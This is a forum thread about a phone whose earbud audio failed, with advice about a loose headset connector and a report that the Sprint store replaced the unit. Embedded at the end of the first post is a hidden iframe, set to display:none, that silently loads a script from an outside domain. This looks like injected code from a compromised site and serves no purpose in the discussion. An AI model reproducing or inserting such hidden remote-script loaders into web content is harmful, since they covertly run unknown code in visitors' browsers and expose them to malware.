Failed earbud driver circuit

Worked fine, then 'pop' - and earbud audio dropped to almost zero. The other party could hear fine, but nothing I did (volume, warm/hot resets, spare earbuds) would solve the problem. I used a scope to examine the internals of the connector - no visible defect.

I use an earbud almost 100%, and this is a big deal for me.

Is there ANYthing I can do other than visit the Sprintechdroids?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

the other end could hear your convo but you could not hear them? and severall headsets all had the same outcome? then the problem lies in the connector in the phone... it may have become loose.. since you use headsets frequently as you posted, its probably has come loose inside on the board.. sounds more mechanical than software related... did you "jiggle" the coonnector to see if it would connect?

...sounds like insurance time...

Sprint's service was super!

The Sprint store took only a few minutes to check my phone and hand me a replacement. It was in an i300-size unadorned box, so was obviously a return/refurb - which doesn't trouble me at all.

Works perfectly. According to the counterdroid they conduct zero repairs - just swap and ship to Samsung.
